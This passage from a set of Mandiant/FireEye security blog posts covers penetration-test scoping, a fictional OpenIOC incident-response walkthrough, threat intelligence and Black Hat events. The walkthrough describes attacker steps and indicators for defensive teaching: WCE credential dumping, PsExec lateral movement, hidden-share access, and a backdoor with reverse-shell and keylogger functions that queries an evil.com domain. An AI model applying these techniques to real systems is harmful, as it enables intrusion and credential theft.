  3. An individual or malware that is behind the firewall and on your internal corporate network?
  4. Your own employees ("insider threats")?
  5. Your customers (or attackers who may compromise customers' systems/accounts)?
  6. Your vendors, service providers, and other business partners (or attackers who may have compromised their systems)?

The answer to this will help drive the type of testing to be performed and the types of test user accounts (if any) to provision. The next section will describe some possible penetration test types, but it's helpful to also discuss the types of attackers you would like the penetration test to simulate.

What

What type of penetration test do you want performed? For organizations new to penetration testing, we recommend starting with an external network penetration test, which will assess your Internet-accessible systems in the same way that an attacker anywhere in the world could access them. Beyond that, there are several options:

  1. Internal network penetration test - A penetration test of your internal corporate network. Typically we start these types of assessments with only a network connection on the corporate networks, but a common variant is what we call an "Insider Threat Assessment," where we start with one of your standard workstations and a standard user account.
  2. Web application security assessment - A review of custom web application code for security vulnerabilities such as access control issues, SQL injection, cross-site scripting (XSS) and others. These are best done in a test or development environment to minimize impact to the production environment.
  3. Social engineering - Using deceptive email, phone calls, and/or physical entry to gain access to systems.
  4. Wireless penetration test - A detailed security assessment of wireless network(s) at one or more of your locations. This typically includes a survey of the location looking for unauthorized ("rogue") wireless access points that have been connected to the corporate network and are often insecurely configured.

If budgets were not an issue, you would want to do all of the above, but in reality you will need to prioritize your efforts on what makes sense for your organization. Keep in mind that the best approach may change over time as your organization matures.

Where

In what physical location should the test take place? Many types of penetration testing can be done remotely, but some require the testers to visit your facility. Physical social engineering engagements and wireless assessments clearly need to be performed at one (or more) of your locations.

Some internal penetration tests can be done remotely via a VPN connection, but we recommend conducting them at your location whenever possible. If your internal network has segmentation in place (as we recommend), then you should work with your penetration testing organization to determine the best physical location for the test to be performed. Generally, you'll want to do the internal penetration test from a network segment that has broad access to other portions of the internal network in order to get the best coverage from the test.

Another "Where" to consider for remote testing is where the testers are physically located. When testers are in a different country than you, legal issues can arise with data provisioning and accessibility. Differences in language, culture, and time zones could also make coordination and interpretation of results more difficult.

When

We recommend that most organizations get some sort of security assessment on an annual basis, but that security assessment does not necessarily need to be a penetration test (see Penetration Testing Has Come Of Age - How to Take Your Security Program to the Next Level). Larger organizations may have multiple assessments per year, each focused in a different area.

Within the year, the timing of the penetration test is usually pretty flexible. You will want to make sure that the right people from your organization are available to initiate and manage the test - and to receive results and begin implementing changes. Based on your organization's change control procedures, you may need to work around system freezes or other activities. Testing in December can be difficult due to holidays and vacation, along with year-end closeout activities, especially for organizations in retail, e-commerce, and payment processing.

If you have significant upgrades planned for the systems that will be tested, it is typically best to schedule the test for a month or two after the upgrades are due to be finished. This will allow some time for the inevitable delays in deploying the upgrades as well give the upgraded systems (and their administrators) a bit of time to "settle in" and get fully configured before being tested.

Who (part 2)

The other "who" question to consider is who will perform the penetration test? We recommend considering the following when selecting a penetration testing provider:

  1. What are the qualifications of the organization and the individuals who will be performing the test? What differentiates them from other providers?
  2. To what degree does their testing rely on automated vulnerability scanners vs. hands on manual testing?
  3. How well do they understand the threat actors that are relevant to your environment? How well are they able to emulate real world attacks?
  4. What deliverables will you receive from the test? Are they primarily the output of an automated tool? Ask for samples.
  5. Are they unbiased? Do they use penetration tests as a means to sell or resell other products and services?

No doubt, there are other questions that you will want to consider when scoping a penetration test, but we hope that these will help you get started. If you'd like to read more about Mandiant's penetration testing (and other) services, you can do so here. Of course, also feel free to contact us if you'd like to talk about your situation and how Mandiant can best assess your organization's security.

Investigating with Indicators of Compromise (IOCs) – Part II

Written by Will Gibb & Devon Kerr

In our blog post "Investigating with Indicators of Compromise (IOCs) - Part I," we presented a scenario involving the "Acme Widgets Co.," a company investigating an intrusion, and its incident responder, John. John's next objective is to examine the system "ACMWH-KIOSK" for evidence of attacker activity. Using the IOCs containing the tactics, techniques and procedures (TTPs) he developed during the analysis of "ACM-BOBBO," John identifies the following IOC hits:

Table 1: IOC hit summary

After reviewing IOC hits in Redline™, John performs Live Response and put together the following timeline of suspicious activity on "ACMWH-KIOSK".

Table 2: Summary of significant artifacts

John examines the timeline in order to surmise the following chain of activities:

  • On October 15, 2013, at approximately 16:17:56 UTC, the attacker performed a type 3 network logon, described here, to "ACMWH-KIOSK" from "ACM-BOBBO" using the ACME domain service account, "backupDaily."
  • A few seconds later, the attacker copied two executables, "acmCleanup.exe" and "msspcheck.exe," from "ACM-BOBBO" to "C:$RECYCLE.BIN."

By generating MD5 hashes of both files, John determines that "acmCleanup.exe" is identical to the similarly named file on "ACM-BOBBO", which means it won't require malware analysis. Since the MD5 hash of "msspcheck.exe" was not previously identified, John sends binary to a malware analyst, whose analysis reveals that "msspcheck.exe" is a variant of the "acmCleanup.exe" malware.

  • About a minute later, at 16:19:02 UTC, the attacker executed the Sysinternals PsExec remote command execution utility, which ran for approximately three minutes.
  • During this time period, event logs recorded the start and stop of the "WCE SERVICE" service, which corresponds to the execution of the Windows Credentials Editor (WCE).

John can assume PsExec was used to execute WCE, which is reasonable given the timeline of events and artifacts present on the system.

About seven minutes, later the registry recorded the modification of a Run key associated with persistence for "msspcheck.exe." Finally, at 16:48:11 UTC, the attacker logged off from "ACMWH-KIOSK".

John found no additional evidence of compromise. Since the IOCs are living documents, John's next step is to update his IOCs with relevant findings from his investigation of the kiosk system. John updates the "acmCleanup.exe (BACKDOOR)" IOC with information from the "msspcheck.exe" variant of the attacker's backdoor including:

  • File metadata like filename and MD5.
  • A uniquely named process handle discovered by John's malware analyst.
  • A prefetch entry for the "msspcheck.exe" binary.
  • Registry artifacts associated with persistence of "msspcheck.exe."

From there, John double-checks the uniqueness of the additional filename with some search engine queries. He can confirm that "msspcheck.exe" is a unique filename and update his "acmCleanup.exe (BACKDOOR)" IOC. By updating his existing IOC, John ensures that he will be able to identify evidence attributed to this specific variant of the backdoor.

Changes to the original IOC have been indicated in green.

The updated IOC can be seen below:

Figure 1: Augmented IOC for acmCleanup.exe (BACKDOOR)

John needs additional information before he can start to act. He knows two things about the attacker that might be able to help him out:

  • The attacker is using a domain service account to perform network logons.
  • The attacker has been using WCE to obtain credentials and the "WCE SERVICE" service appears in event logs.

John turns to his security event and incident management (SEIM) system, which aggregates logs from his domain controllers, enterprise antivirus and intrusion detection systems. A search of type 3 network logons using the "backupDaily" domain account turns up 23 different systems accessed using that account. John runs another query for the "WCE SERVICE" and sees that logs from 3 domain controllers contain that service event. John needs to look for IOCs across all Acme machines in a short period of time.

Leveraging the Power of Solutions and Intelligence

Welcome to my first post as a FireEye™ employee! Many of you have asked me what I think of FireEye's acquisition of Mandiant. One of the aspects of the new company that I find most exciting is our increased threat intelligence capabilities. This post will briefly explore what that means for our customers, prospects, and the public.

By itself, Mandiant generates threat intelligence in a fairly unique manner from three primary sources. First, our professional services division learns about adversary tools, tactics, and procedures (TTPs) by assisting intrusion victims. This "boots on the ground" offering is unlike any other, in terms of efficiency (a small number of personnel required), speed (days or weeks onsite, instead of weeks or months), and effectiveness (we know how to remove advanced foes). By having consultants inside a dozen or more leading organizations every week of the year, Mandiant gains front-line experience of cutting-edge intrusion activity. Second, the Managed Defense™ division operates our software and provides complementary services on a multi-year subscription basis. This team develops long-term counter-intrusion experience by constantly assisting another set of customers in a managed security services model. Finally, Mandiant's intelligence team acquires data from a variety of sources, fusing it with information from professional services and managed defense. The output of all this work includes deliverables such as the annual M-Trends report and last year's APT1 document, both of which are free to the public. Mandiant customers have access to more intelligence through our software and services.

As a security software company, FireEye deploys powerful appliances into customer environments to inspect and (if so desired) quarantine malicious content. Most customers choose to benefit from the cloud features of the FireEye product suite. This decision enables community self-defense and exposes a rich collection of the world's worst malware. As millions more instances of FireEye's MVX technology expand to mobile, cloud and data center environments, all of us benefit in terms of protection and visibility. Furthermore, FireEye's own threat intelligence and services components generate knowledge based on their visibility into adversary software and activity. Recent examples include breaking news on Android malware, identifying Yahoo! systems serving malware, and exploring "cyber arms" dealers. Like Mandiant, FireEye's customers benefit from intelligence embedded into the MVX platforms.

Many have looked at the Mandiant and FireEye combination from the perspective of software and services. While these are important, both ultimately depend on access to the best threat intelligence available. As a combined entity, FireEye can draw upon nearly 2,000 employees in 40 countries, with a staff of security consultants, analysts, engineers, and experts not found in any other private organization. Stay tuned to the FireEye and Mandiant blogs as we work to provide an integrated view of adversary activity throughout 2014.

I hope you can attend the FireEye + Mandiant - 4 Key Steps to Continuous Threat Protection webinar on Wednesday, Jan 29 at 2pm ET. During the webinar Manish Gupta, FireEye SVP of Products, and Dave Merkel, Mandiant CTO and VP of Products will discuss why traditional IT security defenses are no longer the safeguards they once were and what's now needed to protect against today's advanced threats.

Best of the Best in 2013: The Armory

Everyone likes something for free. And there is no better place to go to get free analysis, intelligence and tools than The Armory on M-Unition. During the past year, we've offered intelligence and analysis on new threat activity, sponsored open source projects and offered insight on free tools like Redline™, all of which has been highlighted on our blog.

In case you've missed it, here are some of our most popular posts:

Challenges in Malware and Intelligence Analysis: Similar Network Protocols, Different Backdoors and Threat Groups

In this post, Mandiant's Intel shares insight on threat activity. Specifically, two separate APT groups, using two different backdoors that had very similar networking protocols. Read more to learn what they found.

New Release: OWASP Broken Web Applications Project VM Version 1.1

Chuck Willis overviews version 1.1 of the Mandiant-sponsored OWASP Broken Web Applications Project Virtual Machine (VM). If you are not familiar with this open source project, it provides a freely downloadable VM containing more than 30 web applications with known or intentional security vulnerabilities. Many people use the VM for training or self-study to learn about web application security vulnerabilities, including how to find them, exploit them, and fix them. It can also be used for other purposes such as testing web application assessment tools and techniques or understanding evidence of web application attacks.

Back to Basics Series: OpenIOC

Will Gibb and a few of his colleagues at Mandiant embark on a series going back to the basics and looking deeper at OpenIOC - how we got where we are today, how to make and use IOCs, and the future of OpenIOC.

Check out related posts here: The History of OpenIOC, Back to the Basics, OpenIOC, IOC Writer and Other Free Tools.

Live from Black Hat 2013: Redline, Turbo Talk, and Arsenal

Sitting poolside at Black Hat USA 2013, Mandiant's Kristen Cooper chats with Ted Wilson about Redline in this latest podcast. Ted leads the development of Redline where he provides innovative investigative features and capabilities enabling both the seasoned investigator and those with considerably less experience to answer the question, "have you been compromised?"

Utilities Industry in the Cyber Targeting Scope

Our intel team is back again, this time with an eye on the utilities industry. As part of our incident response and managed defense work, Mandiant has observed Chinese APT groups exploiting the computer networks of U.S. utilities enterprises servicing or providing electric power to U.S. consumers, industry, and government. The most likely targets for data theft in this industry include smart grid technologies, water and waste management expertise, and negotiations information related to existing or pending deals involving Western utilities companies operating in China.

OpenIOC Series: Investigating with Indicators of Compromise (IOCs) – Part I

Written by Devon Kerr & Will Gibb

The Back to Basics: OpenIOC blog series previously discussed how Indicators of Compromise (IOCs) can be used to codify information about malware or utilities and describe an attacker's methodology. Also touched on were the parts of an IOC, such as the metadata, references, and definition sections. This blog post will focus on writing IOCs by providing a common investigation scenario, following along with an incident response team as they investigate a compromise and assemble IOCs.

Our scenario involves a fictional organization, "Acme Widgets Co.", which designs, manufactures and distributes widgets. Last week, this organization held a mandatory security-awareness training that provided attendees with an overview of common security topics including password strength, safe browsing habits, email phishing and the risks of social media. During the section on phishing, one employee expressed concern that he may have been phished recently. Bob Bobson, an administrator, indicated that some time back he'd received a strange email about a competitor's widget and was surprised that the PDF attachment wouldn't open. A member of the security operations staff, John Johnson, was present during the seminar and quickly initiated an investigation of Bob's system using the Mandiant Redline™ host investigation tool. John used Redline to create a portable collectors configured to obtain live response data from Bob's system which included file system metadata, the contents of the registry, event logs, web browser history, as well as service information.

John ran the collectors on Bob's system and brought the data back to his analysis workstation for review. Through discussions with Bob, John learned that the suspicious e-mail likely arrived on October 13, 2013.

After initial review of the evidence, John assembled the following timeline of suspicious activity on the system.

Table 1: Summary of significant artifacts

Based on this analysis, John pieced together a preliminary narrative: The attacker sent a spear-phishing email to Bob which contained a malicious PDF attachment, "Ultrawidget.pdf", which Bob saved to the desktop on October 10, 2013, at 20:19:07 UTC. Approximately five minutes later, at 20:24:44 UTC, the file "C:WINDOWSSysWOW64acmCleanup.exe" was created as well as a Run key used for persistence. These events were likely the result of Bob opening the PDF. John sent the PDF to a malware analyst to determine the nature of the exploit used to infect Bob's PC.

The first IOC John writes describes the malware identified on Bob's PC, "acmCleanup.exe", as well as the malicious PDF. IOCs sometimes start out as rudimentary - looking for the known file hashes, filenames and persistence mechanisms of the malware identified. Here is what an initial IOC looks like:

Figure 1: Initial IOC for acmCleanup.exe (BACKDOOR)

As analysis continues, these IOCs are updated and improved - incorporating indicator terms from malware and intelligence analysis as well as being refined based on the environment. In this sense, the IOC is a living document. For example, additional analysis may reveal more registry key information, additional files which may be written to disk, or information for identifying the malware in memory. Here is the same IOC, after augmenting it with the results of malware analysis:

Figure 2: Augmented IOC for acmCleanup.exe (BACKDOOR)

The augmented IOC will continue to identify the exact malware discovered on Bob's PC. This improved IOC will also identify malware which has things in common with that backdoor:

  • Malware which uses the same Mutex, a process attribute that will prevent the machine from being infected multiple times with the same backdoor
  • Malware which performs DNS queries for the malicious domain "23vsx.evil.com"
  • Malware which has a specific set of import functions; in this case which correspond to reverse shell and keylogger functionality

Beginning on October 11, the attacker accessed the system and executed the Windows command "ipconfig" at 20:24:00 UTC, resulting in the creation of a prefetch file. Approximately five minutes later, the attacker began uploading files to "C:$RECYCLE.BIN". Based on review of their MD5 hashes, three files ("wce.exe", "getlsasrvaddr.exe", "update.exe") were identified as known credential dumping utilities while others ("filewalk32.exe", "rar.exe") were tools for performing file system searches and creating WinRAR archives. These items should be recorded in an IOC, as a representation of an attacker's tools, techniques and procedures (TTPs). It is important to know that an attacker is likely to have interacted with many more systems than were infected with malware; for this reason it is crucial to look for evidence that an attacker has accessed systems. Some of the most common activities attackers perform on these systems include password-dumping, reconnaissance and data theft.

Seeing that the attacker had staged file archives and utilities in the "$Recycle.Bin" folder, John also created an IOC to find artifacts present there. This IOC was designed to identify files in the root of the "$Recycle.Bin" directory; or to identify if a user (notably, the attacker) tried to access the "$Recycle.Bin" folder by manually typing it in the address bar of Explorer by checking TypedPaths in the Registry. This is an example of encapsulating an attacker's TTPs in an OpenIOC form.

Figure 3: IOC for Unusual Files in "C:RECYCLER" and "C:$RECYCLE.BIN" (Methodology)

On October 15, 2013, at 12:15:37 UTC, the Sysinternals PsExec utility was created in "C:$RECYCLE.BIN". Approximately four hours later, at 16:11:03 UTC, the attacker used the Internet Explorer browser to access text files located in "C:$RECYCLE.BIN". Between 16:11:03 UTC and 16:11:06 UTC, the attacker accessed two text files which were no longer present on the system. At 16:17:55 UTC, the attacker mounted the remote hidden share "\10.20.30.101C$". At 16:20:29 UTC, the attacker executed the Windows "tree" command, resulting in the creation of a prefetch file, a command which produces a filesystem listing. At 17:37:37 UTC, the attacker created one WinRAR archive, "C:$Recycle.Bina.rar" which contained two text files, "c.txt" and "a.txt". These text files contained output from the Windows "tree" and "ipconfig" commands. No further evidence was present on the system. John noted that the earliest event log entries present on the system start approximately two minutes after the creation of "a.rar". It is likely that the attacker cleared the event logs before disconnecting from the system.

John identified the lateral movement to the 10.20.30.101 host, from "ACM-BOBBO" through registry keys that recorded the mount of the hidden C$ share. By recording this type of artifact in an IOC, John will be able to quickly see if the attacker has pivoted to another part of the Acme Widgets Co. network when investigating 10.20.30.101. He included artifacts looking for other common hidden shares such as IPC$ and ADMIN$. The effectiveness of an IOC may be influenced by the environment the IOC was created for. This IOC, for example, may generate a significant number of false-positives in an environment where these hidden shares are legitimately used. At Acme Widgets Co., however, the use of hidden shares is considered highly suspicious.

Figure 4 IOC for Lateral Movement (Methodology)Figure 4 IOC for Lateral Movement (Methodology)

At the end of the day, John authored three new IOCs based on his current investigation. He knows that if he records the artifacts he identified from his investigation into the "ACM-BOBBO" system, he can apply that knowledge to the investigation of the host at 10.20.30.101. Once he collects information on 10.20.30.101 with his Redline portable collector, he'll be able to match IOCs against the Live Response data, which will let him identify known artifacts quickly prior to beginning Live Response analysis. Although John is using these IOCs to search systems individually, these same IOCs could be used to search for evidence of attacker activity across the enterprise. Armed with this set of IOCs, John sets out to hunt for evil on the host at "10.20.30.101".

Stay tuned for our next blog post, seeing how this investigation develops.

Critical Infrastructure Beyond the Power Grid

The term "critical infrastructure" has earned its spot on the board of our ongoing game of cyber bingo--right next to "Digital Pearl Harbor," "Cyber 9/11," "SCADA" and "Stuxnet."

With "critical infrastructure" thrown about in references to cyber threats nearly every week, we thought it was time for a closer look at just what the term means-and what it means to other cyber threat actors.

The term "critical infrastructure" conjures up images of highways, electrical grids, pipelines, government facilities and utilities. But the U.S. government definition also includes economic security and public health. The Department of Homeland Security defines critical infrastructure as "Systems and assets, whether physical or virtual, so vital to the United States that the incapacity or destruction of such systems and assets would have a debilitating impact on security, national economic security, national public health or safety, or any combination of those matters."[1]

Certainly the U.S. definition is expansive, but some key cyber actors go a step further to include a more abstract "information" asset. Russian officials view information content, flow and influencers as an enormous component of critical infrastructure. Iran and China similarly privilege the security of their information assets in order to protect their governments.

The bottom line?

U.S. companies, who may have never considered themselves a plausible target for cyber threats, could become victims of offensive or defensive state cyber operations. Earlier this year several media outlets-including the New York Times and Washington Post-disclosed that they had been the victims of China-based intrusions. The Times and the Post linked the intrusions on their networks to their reporting on corruption in the upper echelons of the Chinese Communist Party and other issues.

These media outlets weren't sitting on plans for a new fighter jet or cutting edge wind turbines-information often assumed to be at risk for data theft. Rather, the reporters at the Times and Post were perched in key positions to influence U.S. government and public views of the Chinese leadership, possibly in a negative light. The Chinese government had conducted these intrusions against what it deemed critical infrastructure that supported the flow of valuable information.

Who's up next?

State actors motivated to target critical infrastructure (by their own definition or the U.S.') won't just be the usual attention grabbers in cyberspace. We estimate that Iran, Syria, and North Korea all have interest and would be able to conduct or direct some level of network operations. These states are also likely to conduct operations in the near term to identify red lines and gauge corporate and government reactions. With little reputational loss at stake, we expect actors sponsored by or associated with these states to target an array of critical infrastructure targets. Companies who serve as key information brokers-for the public or the U.S. government-should be particularly attuned to the criticality their work is assigned by a variety of cyber threat actors.

 


 

 

 

OpenIOC: Back to the Basics

Written by Will Gibb & Devon Kerr

One challenge investigators face during incident response is finding a way to organize information about an attackers' activity, utilities, malware and other indicators of compromise, called IOCs. The OpenIOC format addresses this challenge head-on. OpenIOC provides a standard format and terms for describing the artifacts encountered during the course of an investigation. In this post we're going to provide a high-level overview of IOCs, including IOC use cases, the structure of an IOC and IOC logic.

Before we continue, it's important to mention that IOCs are not signatures, and they aren't meant to function as a signature would. It is often understated, but an IOC is meant to be used in combination with human intelligence. IOCs are designed to aid in your investigation, or the investigations of others with whom you share threat intelligence.

IOC Use Cases:

There are several use cases for codifying your IOCs, and these typically revolve around your objectives as an investigator. The number of potential use cases is quite large, and we've listed some of the most common use cases below:

  • Find malware/utility: This is the most common use case. Essentially, this is an IOC written to find some type of known malware or utility, either by looking for attributes of the binary, itself, or for some artifact created upon execution, such as a prefetch file or registry key.
  • Methodology: Unlike an IOC written to identify malware or utilities, these IOCs find things you don't necessarily know about, in order to generate investigative leads. For example, if you wanted to identify any service DLL that wasn't signed and which was loaded from any directory that did not include the path "windowssystem32", you could write an IOC to describe that condition. Another good example of a methodology IOC is an IOC that looks for the Registry text value of all "Run" keys for a string ending ".jpg". This represents an abnormal condition which upon investigation may lead to evidence of a compromise.
  • Bulk: You may already be using this kind of IOC. Many organizations subscribe to threat intelligence feeds that deliver a list of MD5s or IP addresses; a bulk IOC can represent a collection of those indicators. These kinds of IOCs are very black and white and are typically only good for an exact match.
  • Investigative: As you investigate systems in an environment and identify evidence of malicious activity such as metadata related to the installation of backdoors, execution of tools, or files being staged for theft, you can track that information in an IOC. These IOCs are similar to bulk IOCs; however, an investigative IOC only contains indicators from a single investigation. Using this type of IOC can help you to prioritize which systems you want to analyze.

IOC components:

An IOC is made up of three main parts: IOC metadata, references and the definition. Let's examine each one of these more closely, noting that we're using the Mandiant IOC Editor (IOCe) downloadable from the Mandiant website:

Metadata: IOC metadata describes information like the author of the IOC (jsmith@domain.tld), the name of the IOC (Evil.exe (BACKDOOR) and a brief description such as "This variant of the open source Poison Ivy backdoor has been configured to beacon to 10.127.10.128 and registers itself as "Microsoft 1atent time services".

References: Within the IOC, references can find information like the name of an investigation or case number, comments and information on the maturity of the IOC such as Alpha, Beta, Release, etc. This data can help you to understand where the IOC fits in your library of threat intelligence. One common use for references is to associate an IOC with a particular threat group. It is not uncommon for certain references to be removed from IOCs when sharing IOCs with third parties.

Definition: This is the content of the IOC, containing the artifacts that an investigator decided to codify in the IOC. For example, these may include the MD5 of a file, a registry path or something found in process memory. Inside the definition, indicators are listed out or combined into expressions that consist of two terms and some form of Boolean logic.

One thing about the OpenIOC format that makes it particularly useful is the ability to combine similar terms using Boolean AND & OR logic. The previous example shows how this type of logic can be used. This type of IOC describes three possible scenarios:

  1. The name of a service is "MS 1atent time services" - OR -
  2. The ServiceDLL name for any service contains "evil.exe" - OR -
  3. The filename is "bad.exe" AND the filesize attribute of that file is within the range 4096 to 10240 bytes.

When you use Boolean logic, remember the following:

  • An AND requires that both sides of the expression are true
  • An OR requires that one side of the expression is true

Understanding that the Boolean statements, such as 'The name of a service is "MS 1atent time services", OR "filename is "bad.exe" AND the filesize attribute of that file is within the range 4096 to 10240 bytes"', are evaluated separately is an important aspect understanding how the logic within an IOC works. These statements are not if-else statements, nor do they both have to exist in order for the IOC to have a match. When investigating a host, if the "MS 1atent time services" service is present, this IOC would have a match; regardless of whether or not the malicious file the IOC described was present on the host as well.

In our next post we're going to have a crash course in writing IOC definitions using the Mandiant IOC editor, IOCe. 

The History of OpenIOC

With the buzz in the security industry this year about sharing threat intelligence, it's easy to get caught up in the hype, and believe that proper, effective sharing of Indicators or Intelligence is something that can just be purchased along with goods or services from any security vendor.

It's really a much more complex problem than most make it out to be, and one that we've been working on for a while. A large part of our solution for managing Threat Indicators is using the OpenIOC standard format.

Since its founding, Mandiant sought to solve the problem of how to conduct leading-edge Incident Response (IR) - and how to scale that response to an entire enterprise. We created OpenIOC as an early step in tackling that problem. Mandiant released OpenIOC to the public as an Open Source project under the Apache 2 license in November of 2011, but OpenIOC had been used internally at Mandiant for several years prior.

IR is a discipline that usually requires highly trained professionals doing very resource-intensive work. Traditionally, these professionals would engage in time-intensive investigations on only a few hosts on a compromised network. Practical limitations on staffing, resources, time, and money would prevent investigations from covering anything other than a very small percentage of most enterprises. Responders would only be able to examine what they had direct access to, with their corresponding conclusions constrained by time and budget.

This level of investigation was almost never enough to give confidence on anything other than the hosts that had been examined - responders were unable to confirm whether other systems were still compromised, or whether the adversary still had footholds in other parts of the network.

Creating a standard way of recording Threat Intelligence into an Indicator was part of what allowed Mandiant to bring a new approach to IR, including the use of an automated solution, such as Mandiant for Intelligent Response® (MIR®). Mandiant's new strategy for IR enabled investigators, who previously could only get to a few hosts in an engagement, to now query entire enterprises in only slightly more time. Using OpenIOC as a standardized format, the Indicators of Compromise (IOCs) were recorded once, and then used to help gather the same information and conduct the same testing on every host across the enterprise via the automated solution. Incident Responders could now spend only a little more time, but cover an exponentially larger number of hosts during the course of an investigation.

Recording the IOCs in OpenIOC had other benefits as well. Indicators from one investigation could be shared with other investigations or organizations, and allow investigators to look for the exact same IOCs wherever they were, without having to worry about translation problems associated with ambiguous formats, such as lists or text documents. One investigator could create an IOC, and then share it with others, who could put that same IOC into their investigative system and look for the same evil as the first person, with little to no additional work.

The format grew organically over time. We always intended that the format be expandable and improvable. Instead of trying to map out every possible use case, Mandiant has updated the format and expanded the dictionaries of IOC Terms as new needs have arisen over time. The version we released in 2011 as "1.0" had already been revised and improved upon internally several times before its Open Source debut. We continue to update the standard as needed, allowing for features and requests that we have received over time from other users or interested parties.

Unlike traditional "signatures," OpenIOC provides the ability to use logical comparison of Indicators in an IOC, providing more flexibility and discrimination than simple lists of artifacts. An extensive library of Indicator Terms allows for a variety of information from hosts and networks to be recorded, and if something is not covered in the existing terms, additional terms may be added. Upcoming features like parameters will allow for further expansion of the standard, including customization for application or organization specific use cases.

Having the OpenIOC standard in place is tremendously powerful, providing benefits for scaling detection and investigation, both of which are key parts of managing the threat lifecycle. OpenIOC enables easy, standardized information sharing once implemented, without adding much to workloads or draining resources. And it is freely available as Open Source; so that others can benefit from some of the methods we have already found to work well in our practice. We hope that as we improve it, you can take even more advantage of what OpenIOC has to offer in your IR and Threat Intelligence workflows.

Next up in the Back to Basics: OpenIOC series, we'll talk about some of the basics of what OpenIOC is and what using it involves - and some of the upcoming things in the future of OpenIOC.

Back to Basics Series: OpenIOC

Over the next few months, a few of my colleagues and I will be touching on various topics related to Mandiant and computer security. As part of this series, we are going to be talking about OpenIOC - how we got where we are today, how to make and use IOCs, and the future of OpenIOC. This topic can't be rolled into a single blog post, so we have developed a brief syllabus to outline the topics that we will be covering in the near future.

The History of OpenIOC

In this post we're going to focus on the past state of threat intelligence sharing and how it has evolved up to this point in the industry. We'll specifically focus on how we implemented OpenIOC at Mandiant as a way to codify threat intelligence.

Back to the Basics

What are indicators of compromise? What is an OpenIOC? What goes into an IOC? How do you read these things? What can you include in them? We will address all of these questions and more.

Investigating with Indicators of Compromise (IOCs)

In this post, we will model an actual incident response and walk through the creation of IOCs to detect malware (and attacker activity) related to the incident presented. Multiple blog posts and IOCs will come out of this exercise.

IOCs at Scale

So far, we will have touched on using Redline™ to deploy OpenIOC when investigating a single host. To deploy IOCs across an enterprise, we use Mandiant for Intelligent Response® (MIR®). Briefly, we will show how we can use MIR to deploy the IOCs built in the previous exercise across an enterprise scenario, expediting the incident response process.

The Future of OpenIOC

What is next? OpenIOC was open sourced in the fall of 2011, and it is time for an upgrade! With the soft-launch of the draft OpenIOC 1.1 spec at Black Hat USA, we've since released a draft of the OpenIOC 1.1 schema. We'll discuss what we changed and why, as well as some of the exciting possibilities that this update makes possible.

Integrating OpenIOC 1.1 into tools

With the release of the OpenIOC 1.1 draft, we also released a tool, ioc writer, which can be used to create or modify OpenIOC 1.1 IOCs. We will detail the capabilities of this library and how you could use it to add OpenIOC support to your own applications. We will also discuss the potential for using parameters to further define application behavior that is not built into the OpenIOC schema itself.

We have several goals for this series:

  • Introduce OpenIOC for people that are not already familiar with OpenIOC
  • Show how you can use OpenIOC to record artifacts identified during an investigation
  • Show how OpenIOC can be deployed to investigate a single host - or a whole enterprise
  • Discuss the future of OpenIOC & the upcoming specification, OpenIOC 1.1
  • Show how OpenIOC 1.1 support can be added to tools, and future capabilities of the standard

Stay tuned for our next post in the series!

Mandiant @ Black Hat USA 2013

In just a few short weeks we'll be boarding a flight to Las Vegas, NV for Black Hat USA 2013. In addition to clothes and toiletries, I want to make sure you go to the annual conference with a full list of Mandiant's activities at the show.

Black Hat Exhibitor Floor:

  • Visit Mandiant at booth #325
  • Pick-up a t-shirt and talk to some Mandiant folks

 

Reception:

Join Mandiant for an unforgettable evening at the famed Shadow Bar, in Caesars Palace. The evening will showcase silhouetted performances by the shadow dancers, and libations will be served up by the venues world-class bartenders who are known to juggle bottles, toss limes, twirl glasses and even do back-flips.

Books & Beer Signing:

  • Richard Bejtlich: "The Practice of Network Security Monitoring"
    Wednesday, July 31
    4:30 - 5:00 PM
    M Lair: Verona Room, The Promenade Level

Book signing with Richard Bejtlich for his new release, "The Practice of Network Security Monitoring", and happy hour. The first five people in line for the book signing will win an invitation to a very special VIP dinner with Richard Bejtlich and Michael Sikorski, and will receive a free copy of their books. The first 30 people in line receive a FREE copy of Richard's book!

  • Michael Sikorski: "Practical Malware Analysis"
    Thursday, Aug 1
    4:30 - 5:00 PM
    M Lair: Verona Room, The Promenade Level

Book signing with Michael Sikorski for his 2012 release, "Practical Malware Analysis", and happy hour. The first 30 people in line receive a FREE copy of Michael's book!

A Day in the Life Presentations

  • Mandiant Labs (M-Labs)
    Wednesday, July 31
    12:45-1:30 PM

Mandiant's Michael Sikorski and Stephen Davis will walk attendees through a typical day for a malware analyst and how they have successfully integrated machine learning into their research.

  • Mandiant MCIRT Analysts
    Thursday, August 1
    12:45 - 1:30 PM

Mandiant's James Condon and Mike Scutt will walk attendees through a typical day as an MCIRT Analyst, using an attack scenario to highlight the tools and processes used by MCIRT Analysts to successfully investigate a compromise.

Arsenal:

  • IOCWriter_11
    Presented by William (Will) Gibb
    Thursday, August 1
    10:00 AM - 12:30 PM
    Station 7

With the impending release of the OpenIOC 1.1 format for sharing threat intelligence, Mandiant will be releasing a set of open source tools for creating and manipulating OpenIOC objects and moving data in and out of the OpenIOC format.

Demonstrations will cover how the tools can be used to create and modify OpenIOC documents, show how it is possible to store Snort and Yara signatures in OpenIOC format and convert those OpenIOC documents back into their native formats. In addition, the integration of these tools into other open source applications will be demonstrated with tools that can automatically extract IOCs from unstructured content.

  • Mandiant Redline™
    Presented by Theodore (Ted) Wilson
    Thursday, August 1
    12:45 - 3:15 PM
    Station 7

Redline, Mandiant's premier free tool, provides host investigative capabilities to users to find signs of malicious activity through memory and file analysis, and the development of a threat assessment profile. With Redline, users can:

- Thoroughly audit and collect all run processes, audit data, and memory images.

- Analyze and view imported audit data, including narrowing and filtering results around a given timeframe using Redline's - Timeline functionality with the TimeWrinkle™ and TimeCrunch™ features.

- Streamline memory analysis with a proven workflow for analyzing malware based on relative priority.

- Identify processes more likely worth investigating based on the Redline Malware Risk Index (MRI) score.

- Perform Indicator of Compromise (IOC) analysis. Supplied with a set of IOCs, the Redline Portable Agent is automatically configured to gather the data required to perform the IOC analysis and an IOC hit result review.

  • OWASP Broken Web
    Presented by Chuck Willis
    Thursday, August 1
    12:45 - 3:15 PM
    Station 8

The Open Web Application Security Project (OWASP) Broken Web Applications project (www.owaspbwa.org) provides a free and open source virtual machine loaded with web applications containing security vulnerabilities. This session will showcase the project VM and exhibit how it can be used for training, testing, and experimentation by people in a variety of roles.

Demonstrations will cover how the project can be used by penetration testers who discover and exploit web application vulnerabilities, by developers and others who prevent and defend against web application attacks, and by individuals who respond to web application incidents. New features and applications in the recently released version 1.1 of the VM will also be highlighted.

Let us know if you'll be at Black Hat USA 2013!

